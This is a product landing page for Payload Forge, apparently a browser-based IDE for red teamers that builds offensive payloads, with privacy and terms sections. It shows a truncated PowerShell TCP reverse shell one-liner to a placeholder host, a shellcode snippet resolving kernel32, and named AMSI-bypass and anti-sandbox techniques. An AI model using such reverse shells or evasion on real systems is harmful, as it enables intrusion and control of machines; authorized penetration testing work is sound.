Payload IDE · Browser-Based

Write.
Assemble.
Deploy.

A full-spectrum payload development environment for security researchers and red teamers. Multi-language support, a curated technique workshop, 20+ built-in offensive tools, and 14+ export formats, all in one browser-based IDE.

Launch Forge Explore Features

Payload Output

48 bytes

0 nulls

OK status

NASM x86_64 · intel · LE

Payloads

● payload.asm NASM

✓ loader.cs C#

✓ macro.vbs VBS

○ dropper.ps1 PS1

Monaco-Powered IDE

Multi-Language
Payload Editor

Write payloads in NASM assembly, C#, VBScript, PowerShell, or Python using a full Monaco editor with syntax highlighting, IntelliSense, and code folding. Assemble, compile, and inspect output bytes without leaving your browser.

NASM · C# · VBScript · PowerShell · Python
x86, x64, ARM, ARM64 & MIPS architectures
Real-time assembly output: size, null bytes, status
Save, organize, and reload payloads across sessions

Payload Forge · Editor ×

NASM payload.asm

VBS macro.vbs

PS1 dropper.ps1

1 2 3 4 5 6 7 8 9 10 11

; x64 Windows: locate kernel32 via PEB

section .text

global _start

_start:

xor rbx, rbx

mov rbx, [gs:0x60] ; PEB

mov rbx, [rbx+0x18] ; LDR

mov rbx, [rbx+0x20] ; InLoadOrder

mov rdx, [rbx+0x50] ; BaseDllName

cmp word [rbx+0x48], 0x18

NASM · x86_64 · intel · 48 bytes · 0 nulls · OK

Technique Library

Curated Offensive
Workshop

The Workshop is a searchable, categorized library of ready-to-use code blocks spanning evasion, injection, persistence, API resolution, and more. Filter by category and language, then insert any technique directly into the active editor with one click.

Categories: Evasion, Injection, Persistence, Loaders, Network
Filter by language: ASM, C, C#, PowerShell, Python, JS
Full-text search across technique names and descriptions
One-click insert into the active editor at cursor position

Workshop ×

Search techniques…

All Evasion Injection Bypass Persistence Loaders

ALL ASM C C# PS1 PY VBS

ASM

Sleep AntiVM

Detect VM via RDTSC delta

+ Add

PS1

AMSI Bypass

Patch amsiScanBuffer

+ Add

CPUID Hypervisor

Check ECX[31] present bit

+ Add

PS1

Process Count Check

Sandboxes run <30 procs

+ Add

Screen Res Check

Detect low-res sandbox

+ Add

Offensive Toolkit

20+ Built-in
Offensive Tools

Payload Forge ships a complete toolkit so you never leave the IDE. From exploitation utilities and reverse shell generators to encoding pipelines, obfuscation tools, and delivery builders, everything runs server-side, directly in the browser.

Pattern Generator, Offset Calculator, ROP Chain Builder
Reverse Shell Generator with 14+ shells across 10+ platforms
Byte Encoder/Decoder (XOR, Caesar, Invert), AMSI Bypass Wrapper
PowerShell Encoder, HTML Smuggling Builder, Format Converter
Base64, Hex to ASCII, Hash Calculator, IP to DWORD, Disassembler

Tools · Reverse Shell Generator ×

Reverse Shell Generator

Set LHOST/LPORT and select a shell type to generate ready-to-use one-liners.

LHOST

10.10.14.1

LPORT

4444

PowerShell TCP PS Encoded C# TCP Bash Python 3

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length))…

Output & Delivery

One payload, every format
you'll ever need.

Export your assembled payload as a raw byte array, a ready-to-run loader, or a delivery-ready script. Copy to clipboard or download directly. Switch formats instantly with no re-assembly required.

C Array

unsigned char[]

Python

b"\x90\x31…"

byte[] array

PowerShell

[Byte[]] $buf

Raw Hex

\x48\x31…

Base64

encoded bytes

Py ctypes

VirtualAlloc loader

Py Keystone

assemble + exec

C Runner

Win32 loader

C# Runner

.NET P/Invoke

Core Capabilities

Everything in One Workspace

From writing the first instruction to delivering a fully staged payload. Payload Forge gives security researchers the complete development environment for every phase of the offensive workflow.

Multi-Language Support

Write payloads in NASM, C#, VBScript, PowerShell, or Python, all with full Monaco syntax highlighting, code folding, and keyboard shortcuts your hands already know.

Technique Workshop

A curated, categorized library of ready-to-use offensive code blocks covering evasion, injection, persistence, and loaders, across all supported languages, searchable and one-click insertable.

ROP Chain Builder

Upload an rp++ gadget file, define building blocks, filter by bad characters, and search for viable gadgets. Compose ROP chains without ever leaving Forge.

Bad Character Analysis

Scan assembled output for bad characters instantly. Identify null bytes, newlines, or any custom bad char set. Combined with the encoder to eliminate them before delivery.

Flexible Export & Download

Switch between 14+ output formats including raw hex, C arrays, Python bytes, PowerShell buffers, and full runner templates, then download the binary or copy to clipboard in one click.

100% Browser-Based

No local installs, no VM dependencies, no NASM binary required. Every tool: assembler, disassembler, encoder, ROP builder, shell generator, runs inside the browser at full speed.

Get Started

Sign In to
the Portal

Payload Forge is available to all Black Star portal users. Sign in to your account to launch Forge directly. Have a question or need support? Send us a message and we'll get back to you.

portal.black-star.cc

[email protected]

Last updated: June 5, 2026

1. Controller

The data controller is Black Star Technologies, represented by Luigi Fiore (P.Iva IT10802321215), reachable at [email protected].

2. Data We Collect

When you use our contact form, we collect: your name, email address, organization, and message content. We do not collect payment data through this website.

3. Purpose and Legal Basis

Data is processed solely to respond to your inquiry. The legal basis is your consent (Art. 6(1)(a) GDPR).

4. Data Retention

Contact form submissions are retained for up to 24 months.

5. Third Parties

We use hCaptcha for bot protection. No personal data is sold or shared with third parties for marketing purposes.

6. Your Rights

Under GDPR you have the right to access, rectify, erase, restrict, and port your data. Contact [email protected].

Last updated: June 5, 2026

1. Acceptance

By accessing Payload Forge or any Black Star Technologies platform you agree to these Terms.

2. Authorized Use Only

Payload Forge is licensed exclusively for authorized, lawful security operations. Use against systems you do not own or have explicit written permission to test is strictly prohibited.

3. Account Eligibility

Access is granted solely to vetted operators: accredited security researchers, penetration testing firms, government agencies, and defense organizations.

4. Intellectual Property

All source code, documentation, and tooling remain the exclusive property of Luigi Fiore / Black Star Technologies. You may not reverse-engineer, redistribute, or sublicense any component.

5. Governing Law

These Terms are governed by the laws of Italy.

6. Contact

Legal inquiries: [email protected].

Write. Assemble. Deploy.

Multi-LanguagePayload Editor

Curated OffensiveWorkshop

20+ Built-inOffensive Tools

One payload, every formatyou'll ever need.

Everything in One Workspace

Multi-Language Support

Technique Workshop

ROP Chain Builder

Bad Character Analysis

Flexible Export & Download

100% Browser-Based

Researchers first.Every designdecision.

Sign In tothe Portal

Write.
Assemble.
Deploy.

Multi-Language
Payload Editor

Curated Offensive
Workshop

20+ Built-in
Offensive Tools

One payload, every format
you'll ever need.

Researchers first.
Every design
decision.

Sign In to
the Portal